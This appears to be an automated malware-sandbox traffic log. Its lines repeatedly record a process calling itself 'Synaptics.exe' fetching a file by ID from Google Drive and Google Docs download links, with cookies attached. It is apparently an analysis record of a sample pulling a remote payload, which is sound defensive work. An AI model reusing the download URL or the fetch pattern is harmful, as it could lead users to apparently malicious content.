                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
